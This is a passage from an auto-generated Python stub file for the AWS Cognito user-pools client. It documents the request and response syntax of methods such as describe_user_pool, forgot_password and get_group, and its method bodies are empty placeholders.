**Request Syntax**
::
response = client.describe_user_import_job(
UserPoolId='string',
JobId='string'
)
**Response Syntax**
::
{
'UserImportJob': {
'JobName': 'string',
'JobId': 'string',
'UserPoolId': 'string',
'PreSignedUrl': 'string',
'CreationDate': datetime(2015, 1, 1),
'StartDate': datetime(2015, 1, 1),
'CompletionDate': datetime(2015, 1, 1),
'Status': 'Created'|'Pending'|'InProgress'|'Stopping'|'Expired'|'Stopped'|'Failed'|'Succeeded',
'CloudWatchLogsRoleArn': 'string',
'ImportedUsers': 123,
'SkippedUsers': 123,
'FailedUsers': 123,
'CompletionMessage': 'string'
}
}
**Response Structure**
- *(dict) --*
Represents the response from the server to the request to describe the user import job.
- **UserImportJob** *(dict) --*
The job object that represents the user import job.
- **JobName** *(string) --*
The job name for the user import job.
- **JobId** *(string) --*
The job ID for the user import job.
- **UserPoolId** *(string) --*
The user pool ID for the user pool that the users are being imported into.
- **PreSignedUrl** *(string) --*
The pre-signed URL to be used to upload the ``.csv`` file.
- **CreationDate** *(datetime) --*
The date the user import job was created.
- **StartDate** *(datetime) --*
The date when the user import job was started.
- **CompletionDate** *(datetime) --*
The date when the user import job was completed.
- **Status** *(string) --*
The status of the user import job. One of the following:
* ``Created`` - The job was created but not started.
* ``Pending`` - A transition state. You have started the job, but it has not begun importing users yet.
* ``InProgress`` - The job has started, and users are being imported.
* ``Stopping`` - You have stopped the job, but the job has not stopped importing users yet.
* ``Stopped`` - You have stopped the job, and the job has stopped importing users.
* ``Succeeded`` - The job has completed successfully.
* ``Failed`` - The job has stopped due to an error.
* ``Expired`` - You created a job, but did not start the job within 24-48 hours. All data associated with the job was deleted, and the job cannot be started.
- **CloudWatchLogsRoleArn** *(string) --*
The role ARN for the Amazon CloudWatch Logging role for the user import job. For more information, see "Creating the CloudWatch Logs IAM Role" in the Amazon Cognito Developer Guide.
- **ImportedUsers** *(integer) --*
The number of users that were successfully imported.
- **SkippedUsers** *(integer) --*
The number of users that were skipped.
- **FailedUsers** *(integer) --*
The number of users that could not be imported.
- **CompletionMessage** *(string) --*
The message returned when the user import job is completed.
:type UserPoolId: string
:param UserPoolId: **[REQUIRED]**
The user pool ID for the user pool that the users are being imported into.
:type JobId: string
:param JobId: **[REQUIRED]**
The job ID for the user import job.
:rtype: dict
:returns:
"""
pass
def describe_user_pool(self, UserPoolId: str) -> Dict:
"""
Returns the configuration information and metadata of the specified user pool.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/DescribeUserPool>`_
**Request Syntax**
::
response = client.describe_user_pool(
UserPoolId='string'
)
**Response Syntax**
::
{
'UserPool': {
'Id': 'string',
'Name': 'string',
'Policies': {
'PasswordPolicy': {
'MinimumLength': 123,
'RequireUppercase': True|False,
'RequireLowercase': True|False,
'RequireNumbers': True|False,
'RequireSymbols': True|False
}
},
'LambdaConfig': {
'PreSignUp': 'string',
'CustomMessage': 'string',
'PostConfirmation': 'string',
'PreAuthentication': 'string',
'PostAuthentication': 'string',
'DefineAuthChallenge': 'string',
'CreateAuthChallenge': 'string',
'VerifyAuthChallengeResponse': 'string',
'PreTokenGeneration': 'string',
'UserMigration': 'string'
},
'Status': 'Enabled'|'Disabled',
'LastModifiedDate': datetime(2015, 1, 1),
'CreationDate': datetime(2015, 1, 1),
'SchemaAttributes': [
{
'Name': 'string',
'AttributeDataType': 'String'|'Number'|'DateTime'|'Boolean',
'DeveloperOnlyAttribute': True|False,
'Mutable': True|False,
'Required': True|False,
'NumberAttributeConstraints': {
'MinValue': 'string',
'MaxValue': 'string'
},
'StringAttributeConstraints': {
'MinLength': 'string',
'MaxLength': 'string'
}
},
],
'AutoVerifiedAttributes': [
'phone_number'|'email',
],
'AliasAttributes': [
'phone_number'|'email'|'preferred_username',
],
'UsernameAttributes': [
'phone_number'|'email',
],
'SmsVerificationMessage': 'string',
'EmailVerificationMessage': 'string',
'EmailVerificationSubject': 'string',
'VerificationMessageTemplate': {
'SmsMessage': 'string',
'EmailMessage': 'string',
'EmailSubject': 'string',
'EmailMessageByLink': 'string',
'EmailSubjectByLink': 'string',
'DefaultEmailOption': 'CONFIRM_WITH_LINK'|'CONFIRM_WITH_CODE'
},
'SmsAuthenticationMessage': 'string',
'MfaConfiguration': 'OFF'|'ON'|'OPTIONAL',
'DeviceConfiguration': {
'ChallengeRequiredOnNewDevice': True|False,
'DeviceOnlyRememberedOnUserPrompt': True|False
},
'EstimatedNumberOfUsers': 123,
'EmailConfiguration': {
'SourceArn': 'string',
'ReplyToEmailAddress': 'string',
'EmailSendingAccount': 'COGNITO_DEFAULT'|'DEVELOPER'
},
'SmsConfiguration': {
'SnsCallerArn': 'string',
'ExternalId': 'string'
},
'UserPoolTags': {
'string': 'string'
},
'SmsConfigurationFailure': 'string',
'EmailConfigurationFailure': 'string',
'Domain': 'string',
'CustomDomain': 'string',
'AdminCreateUserConfig': {
'AllowAdminCreateUserOnly': True|False,
'UnusedAccountValidityDays': 123,
'InviteMessageTemplate': {
'SMSMessage': 'string',
'EmailMessage': 'string',
'EmailSubject': 'string'
}
},
'UserPoolAddOns': {
'AdvancedSecurityMode': 'OFF'|'AUDIT'|'ENFORCED'
},
'Arn': 'string'
}
}
**Response Structure**
- *(dict) --*
Represents the response to describe the user pool.
- **UserPool** *(dict) --*
The container of metadata returned by the server to describe the pool.
- **Id** *(string) --*
The ID of the user pool.
- **Name** *(string) --*
The name of the user pool.
- **Policies** *(dict) --*
The policies associated with the user pool.
- **PasswordPolicy** *(dict) --*
The password policy.
- **MinimumLength** *(integer) --*
The minimum length of the password policy that you have set. Cannot be less than 6.
- **RequireUppercase** *(boolean) --*
In the password policy that you have set, refers to whether you have required users to use at least one uppercase letter in their password.
- **RequireLowercase** *(boolean) --*
In the password policy that you have set, refers to whether you have required users to use at least one lowercase letter in their password.
- **RequireNumbers** *(boolean) --*
In the password policy that you have set, refers to whether you have required users to use at least one number in their password.
- **RequireSymbols** *(boolean) --*
In the password policy that you have set, refers to whether you have required users to use at least one symbol in their password.
- **LambdaConfig** *(dict) --*
The AWS Lambda triggers associated with the user pool.
- **PreSignUp** *(string) --*
A pre-registration AWS Lambda trigger.
- **CustomMessage** *(string) --*
A custom Message AWS Lambda trigger.
- **PostConfirmation** *(string) --*
A post-confirmation AWS Lambda trigger.
- **PreAuthentication** *(string) --*
A pre-authentication AWS Lambda trigger.
- **PostAuthentication** *(string) --*
A post-authentication AWS Lambda trigger.
- **DefineAuthChallenge** *(string) --*
Defines the authentication challenge.
- **CreateAuthChallenge** *(string) --*
Creates an authentication challenge.
- **VerifyAuthChallengeResponse** *(string) --*
Verifies the authentication challenge response.
- **PreTokenGeneration** *(string) --*
A Lambda trigger that is invoked before token generation.
- **UserMigration** *(string) --*
The user migration Lambda config type.
- **Status** *(string) --*
The status of a user pool.
- **LastModifiedDate** *(datetime) --*
The date the user pool was last modified.
- **CreationDate** *(datetime) --*
The date the user pool was created.
- **SchemaAttributes** *(list) --*
A container with the schema attributes of a user pool.
- *(dict) --*
Contains information about the schema attribute.
- **Name** *(string) --*
A schema attribute of the name type.
- **AttributeDataType** *(string) --*
The attribute data type.
- **DeveloperOnlyAttribute** *(boolean) --*
Specifies whether the attribute type is developer only.
- **Mutable** *(boolean) --*
Specifies whether the value of the attribute can be changed.
For any user pool attribute that's mapped to an identity provider attribute, you must set this parameter to ``true`` . Amazon Cognito updates mapped attributes when users sign in to your application through an identity provider. If an attribute is immutable, Amazon Cognito throws an error when it attempts to update the attribute. For more information, see `Specifying Identity Provider Attribute Mappings for Your User Pool <https://docs.aws.amazon.com/cognito/latest/developerguide/cognito-user-pools-specifying-attribute-mapping.html>`__ .
- **Required** *(boolean) --*
Specifies whether a user pool attribute is required. If the attribute is required and the user does not provide a value, registration or sign-in will fail.
- **NumberAttributeConstraints** *(dict) --*
Specifies the constraints for an attribute of the number type.
- **MinValue** *(string) --*
The minimum value of an attribute that is of the number data type.
- **MaxValue** *(string) --*
The maximum value of an attribute that is of the number data type.
- **StringAttributeConstraints** *(dict) --*
Specifies the constraints for an attribute of the string type.
- **MinLength** *(string) --*
The minimum length.
- **MaxLength** *(string) --*
The maximum length.
- **AutoVerifiedAttributes** *(list) --*
Specifies the attributes that are auto-verified in a user pool.
- *(string) --*
- **AliasAttributes** *(list) --*
Specifies the attributes that are aliased in a user pool.
- *(string) --*
- **UsernameAttributes** *(list) --*
Specifies whether email addresses or phone numbers can be specified as usernames when a user signs up.
- *(string) --*
- **SmsVerificationMessage** *(string) --*
The contents of the SMS verification message.
- **EmailVerificationMessage** *(string) --*
The contents of the email verification message.
- **EmailVerificationSubject** *(string) --*
The subject of the email verification message.
- **VerificationMessageTemplate** *(dict) --*
The template for verification messages.
- **SmsMessage** *(string) --*
The SMS message template.
- **EmailMessage** *(string) --*
The email message template.
- **EmailSubject** *(string) --*
The subject line for the email message template.
- **EmailMessageByLink** *(string) --*
The email message template for sending a confirmation link to the user.
- **EmailSubjectByLink** *(string) --*
The subject line for the email message template for sending a confirmation link to the user.
- **DefaultEmailOption** *(string) --*
The default email option.
- **SmsAuthenticationMessage** *(string) --*
The contents of the SMS authentication message.
- **MfaConfiguration** *(string) --*
Can be one of the following values:
* ``OFF`` - MFA tokens are not required and cannot be specified during user registration.
* ``ON`` - MFA tokens are required for all user registrations. You can only specify required when you are initially creating a user pool.
* ``OPTIONAL`` - Users have the option when registering to create an MFA token.
- **DeviceConfiguration** *(dict) --*
The device configuration.
- **ChallengeRequiredOnNewDevice** *(boolean) --*
Indicates whether a challenge is required on a new device. Only applicable to a new device.
- **DeviceOnlyRememberedOnUserPrompt** *(boolean) --*
If true, a device is only remembered on user prompt.
- **EstimatedNumberOfUsers** *(integer) --*
A number estimating the size of the user pool.
- **EmailConfiguration** *(dict) --*
The email configuration.
- **SourceArn** *(string) --*
The Amazon Resource Name (ARN) of a verified email address in Amazon SES. This email address is used in one of the following ways, depending on the value that you specify for the ``EmailSendingAccount`` parameter:
* If you specify ``COGNITO_DEFAULT`` , Amazon Cognito uses this address as the custom FROM address when it emails your users by using its built-in email account.
* If you specify ``DEVELOPER`` , Amazon Cognito emails your users with this address by calling Amazon SES on your behalf.
- **ReplyToEmailAddress** *(string) --*
The destination to which the receiver of the email should reply to.
- **EmailSendingAccount** *(string) --*
Specifies whether Amazon Cognito emails your users by using its built-in email functionality or your Amazon SES email configuration. Specify one of the following values:
COGNITO_DEFAULT
When Amazon Cognito emails your users, it uses its built-in email functionality. When you use the default option, Amazon Cognito allows only a limited number of emails each day for your user pool. For typical production environments, the default email limit is below the required delivery volume. To achieve a higher delivery volume, specify DEVELOPER to use your Amazon SES email configuration.
To look up the email delivery limit for the default option, see `Limits in Amazon Cognito <https://docs.aws.amazon.com/cognito/latest/developerguide/limits.html>`__ in the *Amazon Cognito Developer Guide* .
The default FROM address is no-reply@verificationemail.com. To customize the FROM address, provide the ARN of an Amazon SES verified email address for the ``SourceArn`` parameter.
DEVELOPER
When Amazon Cognito emails your users, it uses your Amazon SES configuration. Amazon Cognito calls Amazon SES on your behalf to send email from your verified email address. When you use this option, the email delivery limits are the same limits that apply to your Amazon SES verified email address in your AWS account.
If you use this option, you must provide the ARN of an Amazon SES verified email address for the ``SourceArn`` parameter.
Before Amazon Cognito can email your users, it requires additional permissions to call Amazon SES on your behalf. When you update your user pool with this option, Amazon Cognito creates a *service-linked role* , which is a type of IAM role, in your AWS account. This role contains the permissions that allow Amazon Cognito to access Amazon SES and send email messages with your address. For more information about the service-linked role that Amazon Cognito creates, see `Using Service-Linked Roles for Amazon Cognito <https://docs.aws.amazon.com/cognito/latest/developerguide/using-service-linked-roles.html>`__ in the *Amazon Cognito Developer Guide* .
- **SmsConfiguration** *(dict) --*
The SMS configuration.
- **SnsCallerArn** *(string) --*
The Amazon Resource Name (ARN) of the Amazon Simple Notification Service (SNS) caller.
- **ExternalId** *(string) --*
The external ID.
- **UserPoolTags** *(dict) --*
The tags that are assigned to the user pool. A tag is a label that you can apply to user pools to categorize and manage them in different ways, such as by purpose, owner, environment, or other criteria.
- *(string) --*
- *(string) --*
- **SmsConfigurationFailure** *(string) --*
The reason why the SMS configuration cannot send the messages to your users.
- **EmailConfigurationFailure** *(string) --*
The reason why the email configuration cannot send the messages to your users.
- **Domain** *(string) --*
Holds the domain prefix if the user pool has a domain associated with it.
- **CustomDomain** *(string) --*
A custom domain name that you provide to Amazon Cognito. This parameter applies only if you use a custom domain to host the sign-up and sign-in pages for your application. For example: ``auth.example.com`` .
For more information about adding a custom domain to your user pool, see `Using Your Own Domain for the Hosted UI <https://docs.aws.amazon.com/cognito/latest/developerguide/cognito-user-pools-add-custom-domain.html>`__ .
- **AdminCreateUserConfig** *(dict) --*
The configuration for ``AdminCreateUser`` requests.
- **AllowAdminCreateUserOnly** *(boolean) --*
Set to ``True`` if only the administrator is allowed to create user profiles. Set to ``False`` if users can sign themselves up via an app.
- **UnusedAccountValidityDays** *(integer) --*
The user account expiration limit, in days, after which the account is no longer usable. To reset the account after that time limit, you must call ``AdminCreateUser`` again, specifying ``"RESEND"`` for the ``MessageAction`` parameter. The default value for this parameter is 7.
.. note::
If you set a value for ``TemporaryPasswordValidityDays`` in ``PasswordPolicy`` , that value will be used and ``UnusedAccountValidityDays`` will be deprecated for that user pool.
- **InviteMessageTemplate** *(dict) --*
The message template to be used for the welcome message to new users.
See also `Customizing User Invitation Messages <http://docs.aws.amazon.com/cognito/latest/developerguide/cognito-user-pool-settings-message-customizations.html#cognito-user-pool-settings-user-invitation-message-customization>`__ .
- **SMSMessage** *(string) --*
The message template for SMS messages.
- **EmailMessage** *(string) --*
The message template for email messages.
- **EmailSubject** *(string) --*
The subject line for email messages.
- **UserPoolAddOns** *(dict) --*
The user pool add-ons.
- **AdvancedSecurityMode** *(string) --*
The advanced security mode.
- **Arn** *(string) --*
The Amazon Resource Name (ARN) for the user pool.
:type UserPoolId: string
:param UserPoolId: **[REQUIRED]**
The user pool ID for the user pool you want to describe.
:rtype: dict
:returns:
"""
pass
def describe_user_pool_client(self, UserPoolId: str, ClientId: str) -> Dict:
"""
Client method for returning the configuration information and metadata of the specified user pool app client.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/DescribeUserPoolClient>`_
**Request Syntax**
::
response = client.describe_user_pool_client(
UserPoolId='string',
ClientId='string'
)
**Response Syntax**
::
{
'UserPoolClient': {
'UserPoolId': 'string',
'ClientName': 'string',
'ClientId': 'string',
'ClientSecret': 'string',
'LastModifiedDate': datetime(2015, 1, 1),
'CreationDate': datetime(2015, 1, 1),
'RefreshTokenValidity': 123,
'ReadAttributes': [
'string',
],
'WriteAttributes': [
'string',
],
'ExplicitAuthFlows': [
'ADMIN_NO_SRP_AUTH'|'CUSTOM_AUTH_FLOW_ONLY'|'USER_PASSWORD_AUTH',
],
'SupportedIdentityProviders': [
'string',
],
'CallbackURLs': [
'string',
],
'LogoutURLs': [
'string',
],
'DefaultRedirectURI': 'string',
'AllowedOAuthFlows': [
'code'|'implicit'|'client_credentials',
],
'AllowedOAuthScopes': [
'string',
],
'AllowedOAuthFlowsUserPoolClient': True|False,
'AnalyticsConfiguration': {
'ApplicationId': 'string',
'RoleArn': 'string',
'ExternalId': 'string',
'UserDataShared': True|False
}
}
}
**Response Structure**
- *(dict) --*
Represents the response from the server from a request to describe the user pool client.
- **UserPoolClient** *(dict) --*
The user pool client from a server response to describe the user pool client.
- **UserPoolId** *(string) --*
The user pool ID for the user pool client.
- **ClientName** *(string) --*
The client name from the user pool request of the client type.
- **ClientId** *(string) --*
The ID of the client associated with the user pool.
- **ClientSecret** *(string) --*
The client secret from the user pool request of the client type.
- **LastModifiedDate** *(datetime) --*
The date the user pool client was last modified.
- **CreationDate** *(datetime) --*
The date the user pool client was created.
- **RefreshTokenValidity** *(integer) --*
The time limit, in days, after which the refresh token is no longer valid and cannot be used.
- **ReadAttributes** *(list) --*
The Read-only attributes.
- *(string) --*
- **WriteAttributes** *(list) --*
The writeable attributes.
- *(string) --*
- **ExplicitAuthFlows** *(list) --*
The explicit authentication flows.
- *(string) --*
- **SupportedIdentityProviders** *(list) --*
A list of provider names for the identity providers that are supported on this client.
- *(string) --*
- **CallbackURLs** *(list) --*
A list of allowed redirect (callback) URLs for the identity providers.
A redirect URI must:
* Be an absolute URI.
* Be registered with the authorization server.
* Not include a fragment component.
See `OAuth 2.0 - Redirection Endpoint <https://tools.ietf.org/html/rfc6749#section-3.1.2>`__ .
Amazon Cognito requires HTTPS over HTTP except for http://localhost for testing purposes only.
App callback URLs such as myapp://example are also supported.
- *(string) --*
- **LogoutURLs** *(list) --*
A list of allowed logout URLs for the identity providers.
- *(string) --*
- **DefaultRedirectURI** *(string) --*
The default redirect URI. Must be in the ``CallbackURLs`` list.
A redirect URI must:
* Be an absolute URI.
* Be registered with the authorization server.
* Not include a fragment component.
See `OAuth 2.0 - Redirection Endpoint <https://tools.ietf.org/html/rfc6749#section-3.1.2>`__ .
Amazon Cognito requires HTTPS over HTTP except for http://localhost for testing purposes only.
App callback URLs such as myapp://example are also supported.
- **AllowedOAuthFlows** *(list) --*
Set to ``code`` to initiate a code grant flow, which provides an authorization code as the response. This code can be exchanged for access tokens with the token endpoint.
Set to ``token`` to specify that the client should get the access token (and, optionally, ID token, based on scopes) directly.
- *(string) --*
- **AllowedOAuthScopes** *(list) --*
A list of allowed ``OAuth`` scopes. Currently supported values are ``"phone"`` , ``"email"`` , ``"openid"`` , and ``"Cognito"`` .
- *(string) --*
- **AllowedOAuthFlowsUserPoolClient** *(boolean) --*
Set to TRUE if the client is allowed to follow the OAuth protocol when interacting with Cognito user pools.
- **AnalyticsConfiguration** *(dict) --*
The Amazon Pinpoint analytics configuration for the user pool client.
- **ApplicationId** *(string) --*
The application ID for an Amazon Pinpoint application.
- **RoleArn** *(string) --*
The ARN of an IAM role that authorizes Amazon Cognito to publish events to Amazon Pinpoint analytics.
- **ExternalId** *(string) --*
The external ID.
- **UserDataShared** *(boolean) --*
If ``UserDataShared`` is ``true`` , Amazon Cognito will include user data in the events it publishes to Amazon Pinpoint analytics.
:type UserPoolId: string
:param UserPoolId: **[REQUIRED]**
The user pool ID for the user pool you want to describe.
:type ClientId: string
:param ClientId: **[REQUIRED]**
The app client ID of the app associated with the user pool.
:rtype: dict
:returns:
"""
pass
def describe_user_pool_domain(self, Domain: str) -> Dict:
"""
Gets information about a domain.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/DescribeUserPoolDomain>`_
**Request Syntax**
::
response = client.describe_user_pool_domain(
Domain='string'
)
**Response Syntax**
::
{
'DomainDescription': {
'UserPoolId': 'string',
'AWSAccountId': 'string',
'Domain': 'string',
'S3Bucket': 'string',
'CloudFrontDistribution': 'string',
'Version': 'string',
'Status': 'CREATING'|'DELETING'|'UPDATING'|'ACTIVE'|'FAILED',
'CustomDomainConfig': {
'CertificateArn': 'string'
}
}
}
**Response Structure**
- *(dict) --*
- **DomainDescription** *(dict) --*
A domain description object containing information about the domain.
- **UserPoolId** *(string) --*
The user pool ID.
- **AWSAccountId** *(string) --*
The AWS account ID for the user pool owner.
- **Domain** *(string) --*
The domain string.
- **S3Bucket** *(string) --*
The S3 bucket where the static files for this domain are stored.
- **CloudFrontDistribution** *(string) --*
The ARN of the CloudFront distribution.
- **Version** *(string) --*
The app version.
- **Status** *(string) --*
The domain status.
- **CustomDomainConfig** *(dict) --*
The configuration for a custom domain that hosts the sign-up and sign-in webpages for your application.
- **CertificateArn** *(string) --*
The Amazon Resource Name (ARN) of an AWS Certificate Manager SSL certificate. You use this certificate for the subdomain of your custom domain.
:type Domain: string
:param Domain: **[REQUIRED]**
The domain string.
:rtype: dict
:returns:
"""
pass
def forget_device(self, DeviceKey: str, AccessToken: str = None):
"""
Forgets the specified device.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/ForgetDevice>`_
**Request Syntax**
::
response = client.forget_device(
AccessToken='string',
DeviceKey='string'
)
:type AccessToken: string
:param AccessToken:
The access token for the forgotten device request.
:type DeviceKey: string
:param DeviceKey: **[REQUIRED]**
The device key.
:returns: None
"""
pass
def forgot_password(self, ClientId: str, Username: str, SecretHash: str = None, UserContextData: Dict = None, AnalyticsMetadata: Dict = None) -> Dict:
"""
Calling this API causes a message to be sent to the end user with a confirmation code that is required to change the user's password. For the ``Username`` parameter, you can use the username or user alias. If a verified phone number exists for the user, the confirmation code is sent to the phone number. Otherwise, if a verified email exists, the confirmation code is sent to the email. If neither a verified phone number nor a verified email exists, ``InvalidParameterException`` is thrown. To use the confirmation code for resetting the password, call .
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/ForgotPassword>`_
**Request Syntax**
::
response = client.forgot_password(
ClientId='string',
SecretHash='string',
UserContextData={
'EncodedData': 'string'
},
Username='string',
AnalyticsMetadata={
'AnalyticsEndpointId': 'string'
}
)
**Response Syntax**
::
{
'CodeDeliveryDetails': {
'Destination': 'string',
'DeliveryMedium': 'SMS'|'EMAIL',
'AttributeName': 'string'
}
}
**Response Structure**
- *(dict) --*
Respresents the response from the server regarding the request to reset a password.
- **CodeDeliveryDetails** *(dict) --*
The code delivery details returned by the server in response to the request to reset a password.
- **Destination** *(string) --*
The destination for the code delivery details.
- **DeliveryMedium** *(string) --*
The delivery medium (email message or phone number).
- **AttributeName** *(string) --*
The attribute name.
:type ClientId: string
:param ClientId: **[REQUIRED]**
The ID of the client associated with the user pool.
:type SecretHash: string
:param SecretHash:
A keyed-hash message authentication code (HMAC) calculated using the secret key of a user pool client and username plus the client ID in the message.
:type UserContextData: dict
:param UserContextData:
Contextual data such as the user\'s device fingerprint, IP address, or location used for evaluating the risk of an unexpected event by Amazon Cognito advanced security.
- **EncodedData** *(string) --*
Contextual data such as the user\'s device fingerprint, IP address, or location used for evaluating the risk of an unexpected event by Amazon Cognito advanced security.
:type Username: string
:param Username: **[REQUIRED]**
The user name of the user for whom you want to enter a code to reset a forgotten password.
:type AnalyticsMetadata: dict
:param AnalyticsMetadata:
The Amazon Pinpoint analytics metadata for collecting metrics for ``ForgotPassword`` calls.
- **AnalyticsEndpointId** *(string) --*
The endpoint ID.
:rtype: dict
:returns:
"""
pass
def generate_presigned_url(self, ClientMethod: str = None, Params: Dict = None, ExpiresIn: int = None, HttpMethod: str = None):
"""
Generate a presigned url given a client, its method, and arguments
:type ClientMethod: string
:param ClientMethod: The client method to presign for
:type Params: dict
:param Params: The parameters normally passed to
``ClientMethod``.
:type ExpiresIn: int
:param ExpiresIn: The number of seconds the presigned url is valid
for. By default it expires in an hour (3600 seconds)
:type HttpMethod: string
:param HttpMethod: The http method to use on the generated url. By
default, the http method is whatever is used in the method\'s model.
:returns: The presigned url
"""
pass
def get_csv_header(self, UserPoolId: str) -> Dict:
"""
Gets the header information for the .csv file to be used as input for the user import job.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/GetCSVHeader>`_
**Request Syntax**
::
response = client.get_csv_header(
UserPoolId='string'
)
**Response Syntax**
::
{
'UserPoolId': 'string',
'CSVHeader': [
'string',
]
}
**Response Structure**
- *(dict) --*
Represents the response from the server to the request to get the header information for the .csv file for the user import job.
- **UserPoolId** *(string) --*
The user pool ID for the user pool that the users are to be imported into.
- **CSVHeader** *(list) --*
The header information for the .csv file for the user import job.
- *(string) --*
:type UserPoolId: string
:param UserPoolId: **[REQUIRED]**
The user pool ID for the user pool that the users are to be imported into.
:rtype: dict
:returns:
"""
pass
def get_device(self, DeviceKey: str, AccessToken: str = None) -> Dict:
"""
Gets the device.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/GetDevice>`_
**Request Syntax**
::
response = client.get_device(
DeviceKey='string',
AccessToken='string'
)
**Response Syntax**
::
{
'Device': {
'DeviceKey': 'string',
'DeviceAttributes': [
{
'Name': 'string',
'Value': 'string'
},
],
'DeviceCreateDate': datetime(2015, 1, 1),
'DeviceLastModifiedDate': datetime(2015, 1, 1),
'DeviceLastAuthenticatedDate': datetime(2015, 1, 1)
}
}
**Response Structure**
- *(dict) --*
Gets the device response.
- **Device** *(dict) --*
The device.
- **DeviceKey** *(string) --*
The device key.
- **DeviceAttributes** *(list) --*
The device attributes.
- *(dict) --*
Specifies whether the attribute is standard or custom.
- **Name** *(string) --*
The name of the attribute.
- **Value** *(string) --*
The value of the attribute.
- **DeviceCreateDate** *(datetime) --*
The creation date of the device.
- **DeviceLastModifiedDate** *(datetime) --*
The last modified date of the device.
- **DeviceLastAuthenticatedDate** *(datetime) --*
The date in which the device was last authenticated.
:type DeviceKey: string
:param DeviceKey: **[REQUIRED]**
The device key.
:type AccessToken: string
:param AccessToken:
The access token.
:rtype: dict
:returns:
"""
pass
def get_group(self, GroupName: str, UserPoolId: str) -> Dict:
"""
Gets a group.
Requires developer credentials.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/GetGroup>`_
**Request Syntax**
::
response = client.get_group(
GroupName='string',
UserPoolId='string'
)
**Response Syntax**
::
{
'Group': {
'GroupName': 'string',
'UserPoolId': 'string',
'Description': 'string',
'RoleArn': 'string',
'Precedence': 123,
'LastModifiedDate': datetime(2015, 1, 1),
'CreationDate': datetime(2015, 1, 1)
}
}
**Response Structure**
- *(dict) --*
- **Group** *(dict) --*
The group object for the group.
- **GroupName** *(string) --*
The name of the group.
- **UserPoolId** *(string) --*
The user pool ID for the user pool.
- **Description** *(string) --*
A string containing the description of the group.
- **RoleArn** *(string) --*
The role ARN for the group.
- **Precedence** *(integer) --*
A nonnegative integer value that specifies the precedence of this group relative to the other groups that a user can belong to in the user pool. If a user belongs to two or more groups, it is the group with the highest precedence whose role ARN will be used in the ``cognito:roles`` and ``cognito:preferred_role`` claims in the user's tokens. Groups with higher ``Precedence`` values take precedence over groups with lower ``Precedence`` values or with null ``Precedence`` values.
Two groups can have the same ``Precedence`` value. If this happens, neither group takes precedence over the other. If two groups with the same ``Precedence`` have the same role ARN, that role is used in the ``cognito:preferred_role`` claim in tokens for users in each group. If the two groups have different role ARNs, the ``cognito:preferred_role`` claim is not set in users' tokens.
The default ``Precedence`` value is null.
- **LastModifiedDate** *(datetime) --*
The date the group was last modified.
- **CreationDate** *(datetime) --*
The date the group was created.
:type GroupName: string
:param GroupName: **[REQUIRED]**
The name of the group.
:type UserPoolId: string
:param UserPoolId: **[REQUIRED]**
The user pool ID for the user pool.
:rtype: dict
:returns:
"""
pass
def get_identity_provider_by_identifier(self, UserPoolId: str, IdpIdentifier: str) -> Dict:
"""
Gets the specified identity provider.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/GetIdentityProviderByIdentifier>`_
**Request Syntax**
::
response = client.get_identity_provider_by_identifier(
UserPoolId='string',
IdpIdentifier='string'
)
**Response Syntax**
::
{
'IdentityProvider': {
'UserPoolId': 'string',
'ProviderName': 'string',
'ProviderType': 'SAML'|'Facebook'|'Google'|'LoginWithAmazon'|'OIDC',
'ProviderDetails': {
'string': 'string'
},
'AttributeMapping': {
'string': 'string'
},
'IdpIdentifiers': [
'string',
],
'LastModifiedDate': datetime(2015, 1, 1),
'CreationDate': datetime(2015, 1, 1)
}
}
**Response Structure**
- *(dict) --*
- **IdentityProvider** *(dict) --*
The identity provider object.
- **UserPoolId** *(string) --*
The user pool ID.
- **ProviderName** *(string) --*
The identity provider name.
- **ProviderType** *(string) --*
The identity provider type.
- **ProviderDetails** *(dict) --*
The identity provider details, such as ``MetadataURL`` and ``MetadataFile`` .
- *(string) --*
- *(string) --*
- **AttributeMapping** *(dict) --*
A mapping of identity provider attributes to standard and custom user pool attributes.
- *(string) --*
- *(string) --*
- **IdpIdentifiers** *(list) --*
A list of identity provider identifiers.
- *(string) --*
- **LastModifiedDate** *(datetime) --*
The date the identity provider was last modified.
- **CreationDate** *(datetime) --*
The date the identity provider was created.
:type UserPoolId: string
:param UserPoolId: **[REQUIRED]**
The user pool ID.
:type IdpIdentifier: string
:param IdpIdentifier: **[REQUIRED]**
The identity provider ID.
:rtype: dict
:returns:
"""
pass
def get_paginator(self, operation_name: str = None) -> Paginator:
"""
Create a paginator for an operation.
:type operation_name: string
:param operation_name: The operation name. This is the same name
as the method name on the client. For example, if the
method name is ``create_foo``, and you\'d normally invoke the
operation as ``client.create_foo(**kwargs)``, if the
``create_foo`` operation can be paginated, you can use the
call ``client.get_paginator(\"create_foo\")``.
:raise OperationNotPageableError: Raised if the operation is not
pageable. You can use the ``client.can_paginate`` method to
check if an operation is pageable.
:rtype: L{botocore.paginate.Paginator}
:return: A paginator object.
"""
pass
def get_signing_certificate(self, UserPoolId: str) -> Dict:
"""
This method takes a user pool ID, and returns the signing certificate.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/GetSigningCertificate>`_
**Request Syntax**
::
response = client.get_signing_certificate(
UserPoolId='string'
)
**Response Syntax**
::
{
'Certificate': 'string'
}
**Response Structure**
- *(dict) --*
Response from Cognito for a signing certificate request.
- **Certificate** *(string) --*
The signing certificate.
:type UserPoolId: string
:param UserPoolId: **[REQUIRED]**
The user pool ID.
:rtype: dict
:returns:
"""
pass
def get_ui_customization(self, UserPoolId: str, ClientId: str = None) -> Dict:
"""
Gets the UI Customization information for a particular app client's app UI, if there is something set. If nothing is set for the particular client, but there is an existing pool level customization (app ``clientId`` will be ``ALL`` ), then that is returned. If nothing is present, then an empty shape is returned.
